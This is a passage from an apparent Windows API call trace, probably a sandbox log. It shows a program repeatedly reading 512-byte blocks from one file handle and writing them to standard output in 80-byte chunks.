(hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.394] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.394] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] GetFileType (hFile=0x4c) returned 0x1 [0235.394] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.394] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: 
lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.395] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.395] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] GetFileType (hFile=0x4c) returned 0x1 [0235.395] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.395] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.396] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.396] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] GetFileType (hFile=0x4c) returned 0x1 [0235.396] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.396] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 
[0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0235.397] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.397] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.397] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.397] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] GetFileType (hFile=0x4c) returned 0x1 [0235.398] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.398] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.398] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.398] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.399] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType 
(hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] GetFileType (hFile=0x4c) returned 0x1 [0235.399] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.399] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.400] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.400] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, 
lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] GetFileType (hFile=0x4c) returned 0x1 [0235.400] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.400] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, 
lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.401] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.401] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] GetFileType (hFile=0x4c) returned 0x1 [0235.401] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.401] WriteFile (in: hFile=0x4c, 
lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] GetFileType (hFile=0x4c) returned 0x1 [0235.402] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.402] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.402] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.402] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: 